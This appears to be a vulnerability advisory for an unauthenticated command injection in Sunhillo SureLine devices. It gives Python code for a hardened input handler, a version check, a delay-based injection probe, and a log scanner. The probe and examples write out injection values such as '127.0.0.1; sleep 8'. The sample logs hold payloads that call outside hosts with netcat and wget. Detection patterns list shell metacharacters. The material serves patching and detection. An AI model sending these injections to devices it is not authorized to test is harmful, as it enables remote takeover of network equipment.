CVE-2021-36380

9.8 CRITICAL

📋 TL;DR

This vulnerability allows unauthenticated attackers to execute arbitrary operating system commands on Sunhillo SureLine devices by injecting shell metacharacters into the ipAddr or dnsAddr parameters of the /cgi/networkDiag.cgi endpoint. The endpoint requires no authentication, so any host that can reach the device's web interface can exploit it. All Sunhillo SureLine devices running versions before 8.7.0.1.1 are affected.
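The following is an added illustration of the bug class described above, not Sunhillo's networkDiag.cgi source (which this page does not show). A diagnostics handler that pastes the ipAddr or dnsAddr value into a shell command line is injectable; the hardened form validates each value as an address and runs the tool without a shell. The ping/nslookup command shapes are assumptions chosen for the illustration.

```python
"""Illustration of the bug class behind CVE-2021-36380 (added example; this is
not Sunhillo's networkDiag.cgi source). A diagnostics handler that pastes
ipAddr/dnsAddr into a shell command line is injectable; the hardened form
validates each value as an address and runs the tool without a shell.
The ping/nslookup command shapes are assumptions for the illustration."""
import ipaddress
import re
import subprocess

# Characters /bin/sh acts on before the target program sees its arguments.
SHELL_META = set(";|&`$<>()\n\r")
# RFC 1123 style hostname: labels of 1-63 chars, no leading/trailing '-'.
HOSTNAME_RE = re.compile(
    r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?")


def vulnerable_command(ip_addr):
    """The injectable pattern: raw concatenation handed to 'sh -c'.
    ip_addr='8.8.8.8; id' yields 'ping -c 1 8.8.8.8; id' and sh runs both."""
    return f"ping -c 1 {ip_addr}"


def shell_would_interpret(command_line):
    """Illustrative check (not a shell parser): does the line contain
    characters the shell would act on before ping ever sees its argument?"""
    return any(ch in SHELL_META for ch in command_line)


def validate_ip(value):
    """Accept only an IPv4/IPv6 literal; anything else is rejected whole."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        raise ValueError(f"ipAddr is not an IP address: {value!r}") from None


def validate_host(value):
    """Accept an IP literal or a plain hostname. The regex forbids a leading
    '-', so a value can never be mistaken for a command-line option."""
    v = value.strip()
    try:
        return str(ipaddress.ip_address(v))
    except ValueError:
        pass
    if len(v) <= 253 and HOSTNAME_RE.fullmatch(v):
        return v
    raise ValueError(f"dnsAddr is not a hostname: {value!r}")


def hardened_ping_argv(ip_addr):
    """argv list for the hardened handler: validated value, no shell."""
    return ["ping", "-c", "1", validate_ip(ip_addr)]


def hardened_lookup_argv(dns_addr):
    return ["nslookup", validate_host(dns_addr)]


def run_without_shell(argv):
    """argv reaches execve() as separate strings: a value such as
    '8.8.8.8; id' would be one argument to ping, never a second command."""
    return subprocess.run(argv, capture_output=True, text=True, timeout=15)


if __name__ == "__main__":
    print(vulnerable_command("8.8.8.8; id"))   # two commands under 'sh -c'
    print(hardened_ping_argv("8.8.8.8"))
    for bad in ("8.8.8.8; id", "$(id)", "-c 1000000 8.8.8.8"):
        try:
            hardened_ping_argv(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The point of the hardened form is the combination: positive validation rejects anything that is not an address, and the argv list means that even a value that slipped through could never start a second command, because no shell is involved.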

💻 Affected Systems

Products:
  • Sunhillo SureLine
Versions: All versions before 8.7.0.1.1
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerable endpoint is accessible by default without authentication requirements.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attackers to gain root access, install persistent backdoors, pivot to internal networks, and exfiltrate sensitive data.

🟠

Likely Case

Remote code execution leading to system takeover, data theft, and potential use as a foothold for lateral movement within the network.

🟢

If Mitigated

Limited impact if proper network segmentation and access controls prevent external access to vulnerable endpoints.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires only HTTP requests with crafted parameters; no credentials, user interaction or special network position are needed. CISA lists this CVE in its Known Exploited Vulnerabilities (KEV) catalog, confirming exploitation in the wild.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 8.7.0.1.1 and later

Vendor Advisory: https://www.sunhillo.com/product/sureline/

Restart Required: Yes

Instructions:

1. Download the latest firmware version from the Sunhillo support portal.
2. Back up the current configuration.
3. Apply the firmware update via the web interface or CLI.
4. Reboot the device.
5. Verify the version is 8.7.0.1.1 or higher.

🔧 Temporary Workarounds

Network Access Control

Platform: all

Block external access to the SureLine web interface and restrict internal access to authorized IPs only.

Web Server Configuration

Platform: linux

Disable or restrict access to the /cgi/networkDiag.cgi endpoint if not required for operations.

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate SureLine devices from untrusted networks
  • Deploy web application firewall (WAF) rules to block requests to /cgi/networkDiag.cgi whose ipAddr or dnsAddr values contain shell metacharacters. Treat this as a stopgap only: match on URL-decoded values (a payload can arrive as %3B, %7C or %24%28), prefer an allow-list that accepts only an IP address or hostname over a metacharacter deny-list, and keep the network restrictions in place regardless.

🔍 How to Verify

Check if Vulnerable:

Check whether the version is below 8.7.0.1.1 via the web interface or CLI; the version check is authoritative. On devices you are authorized to test, you can corroborate it by sending a request to /cgi/networkDiag.cgi with shell metacharacters in the ipAddr parameter, using a harmless payload such as a delay rather than a real command.

Check Version:

ssh admin@device 'show version' or check via web interface System > About

Verify Fix Applied:

Confirm the version is 8.7.0.1.1 or higher. Repeat the same benign injection test and confirm the injected command no longer runs (for a delay payload, the device answers without the delay).
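An added verification helper, not Sunhillo tooling: it compares a reported firmware version against 8.7.0.1.1 and builds a benign timing probe for the ipAddr parameter. Assumptions not taken from this page: the device reports its version as a dotted numeric string; the CGI accepts a POST form with an ipAddr field and needs no other fields for the injection to trigger; the device's shell has sleep. Run the probe only against devices you are authorized to test.

```python
"""Version check and benign timing probe for CVE-2021-36380 (added example,
not Sunhillo tooling). Assumptions not taken from the advisory: the device
reports a dotted numeric version string; POSTing a form with only an ipAddr
field reaches the injection; the device shell has 'sleep'."""
import time
import urllib.parse
import urllib.request

FIXED_VERSION = "8.7.0.1.1"
PATH = "/cgi/networkDiag.cgi"


def parse_version(text):
    """'8.7.0.1.1' -> (8, 7, 0, 1, 1). A non-numeric suffix on a component
    ('1-rc2') keeps only its leading digits; an empty component counts as 0."""
    parts = []
    for piece in text.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def is_vulnerable_version(reported, fixed=FIXED_VERSION):
    """True when the reported version sorts below the fixed one. Both tuples
    are zero-padded so '8.7.0.1' compares as 8.7.0.1.0 (vulnerable) and
    '8.7.1' as 8.7.1.0.0 (fixed)."""
    a, b = parse_version(reported), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def probe_body(delay_seconds, field="ipAddr"):
    """Form body carrying a harmless delay instead of a real command. A
    vulnerable build stalls for delay_seconds before answering; a fixed one
    answers at once."""
    return urllib.parse.urlencode({field: f"127.0.0.1; sleep {int(delay_seconds)}"})


def classify_timing(elapsed, delay_seconds, timeout):
    """Decide from elapsed time alone. A request that hit the client timeout
    is inconclusive (slow device or dropped connection), not a positive."""
    if elapsed >= timeout:
        return "inconclusive"
    if elapsed >= delay_seconds:
        return "vulnerable"
    return "not vulnerable"


def timing_probe(base_url, delay_seconds=8, timeout=30):
    """POST the probe to your own device and return (elapsed, verdict).
    Send a control request with delay 0 first to learn the baseline latency."""
    req = urllib.request.Request(
        base_url.rstrip("/") + PATH,
        data=probe_body(delay_seconds).encode(),
        method="POST",
    )
    start = time.monotonic()
    try:
        urllib.request.urlopen(req, timeout=timeout).read()
    except OSError:
        pass  # an HTTP error or a reset still tells us how long the CGI ran
    elapsed = time.monotonic() - start
    return elapsed, classify_timing(elapsed, delay_seconds, timeout)


if __name__ == "__main__":
    for v in ("8.6.2.0", "8.7.0.1", "8.7.0.1.1", "8.7.1"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "fixed")
    print(probe_body(8))
```

Pick a delay well above the device's normal response time and below your client timeout, and compare against a control request; on a slow link a single measurement is not enough to call either result.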

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests to /cgi/networkDiag.cgi whose ipAddr or dnsAddr values contain shell metacharacters (;, |, &, $, backtick, etc.), including their URL-encoded forms (%3B, %7C, %24%28)
  • Unusual process execution from the web server context (shells, wget/curl, netcat) on the device
  • Requests to /cgi/networkDiag.cgi from sources that do not normally administer the device; since the endpoint needs no authentication, do not expect failed logins to precede an attack

Network Indicators:

  • HTTP POST requests to /cgi/networkDiag.cgi with unusual parameter values
  • Outbound connections from SureLine device to unexpected external IPs

SIEM Query:

source="sureline-logs" AND uri_path="/cgi/networkDiag.cgi" AND (param_value="*;*" OR param_value="*|*" OR param_value="*&*" OR param_value="*`*" OR param_value="*$(*")

This query assumes the log source stores each parameter value separately and already URL-decoded. Run against a raw query string or POST body it will match every multi-parameter request on "*&*", and it will miss payloads that arrive as %3B, %7C or %24%28; decode the values first, or match on the encoded forms as well.
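An added detection example that implements the intent of the query above over log lines, and also covers the WAF suggestion under "If You Can't Patch". The event format and every log line are constructed for this page and are not Sunhillo or vendor output. Each ipAddr/dnsAddr value is URL-decoded once and then judged, so the "&" between parameters is never a hit, "%3Bid" is, a value that still contains %XX after one decode is flagged as possible double encoding, and anything that is not shaped like an IP address or hostname is flagged even without a known metacharacter.

```python
"""Detection over constructed proxy/WAF events for CVE-2021-36380 (added
example; the event format and the sample lines are constructed for this
page and are not Sunhillo or vendor log output)."""
import re
from urllib.parse import parse_qs

TARGET_PATH = "/cgi/networkDiag.cgi"
WATCHED_PARAMS = ("ipAddr", "dnsAddr")
SHELL_META = set(";|&`$<>\n\r")                      # characters /bin/sh acts on
ADDRESS_CHARS = re.compile(r"[A-Za-z0-9.:-]{1,253}")  # IPv4, IPv6 or hostname shape
PERCENT_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")

# Constructed sample: "<ts> <src_ip> <method> <path> body=\"<form body>\" <status>"
SAMPLE_EVENTS = """\
2024-05-02T10:15:01Z 10.20.0.14 POST /cgi/networkDiag.cgi body="ipAddr=10.0.0.5&dnsAddr=10.0.0.53" 200
2024-05-02T10:15:09Z 203.0.113.7 POST /cgi/networkDiag.cgi body="ipAddr=127.0.0.1%3Bid&dnsAddr=" 200
2024-05-02T10:15:12Z 203.0.113.7 POST /cgi/networkDiag.cgi body="ipAddr=1.1.1.1&dnsAddr=%60nc+198.51.100.9+4444%60" 200
2024-05-02T10:15:20Z 10.20.0.14 POST /cgi/networkDiag.cgi body="ipAddr=1.1.1.1&dnsAddr=resolver.corp.example" 200
2024-05-02T10:15:33Z 203.0.113.7 POST /cgi/networkDiag.cgi body="ipAddr=1.1.1.1%253Bwget+http://203.0.113.7/x" 200
2024-05-02T10:16:00Z 10.20.0.14 GET /cgi/status.cgi body="" 200
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) body="([^"]*)" (\d{3})$')


def classify_value(value):
    """Reasons a URL-decoded parameter value is suspicious (empty if benign)."""
    reasons = []
    if any(ch in SHELL_META for ch in value):
        reasons.append("shell metacharacter")
    if PERCENT_ESCAPE.search(value):
        # Still percent-encoded after one decode: a double-encoded payload
        # aimed at a CGI that decodes again would look exactly like this.
        reasons.append("residual percent-encoding after one decode")
    if not reasons and not ADDRESS_CHARS.fullmatch(value):
        reasons.append("not shaped like an IP address or hostname")
    return reasons


def scan(events):
    """Return (timestamp, src_ip, param, decoded_value, reasons) per hit."""
    alerts = []
    for line in events.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, _method, path, body, _status = m.groups()
        if path != TARGET_PATH:
            continue
        # parse_qs splits on '&' first, then decodes each value exactly once,
        # so the separator itself can never be mistaken for an injected '&'.
        params = parse_qs(body)
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                reasons = classify_value(value)
                if reasons:
                    alerts.append((ts, src, name, value, reasons))
    return alerts


if __name__ == "__main__":
    for ts, src, name, value, reasons in scan(SAMPLE_EVENTS):
        print(f"{ts} {src} {name}={value!r}: {', '.join(reasons)}")
```

Against the sample, the two benign internal requests produce nothing, and the three requests from 203.0.113.7 are each flagged once: the %3B injection, the backtick-wrapped netcat in dnsAddr, and the double-encoded wget. The allow-list test at the end of classify_value is what catches payloads built from characters the deny-list does not name.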

🔗 References
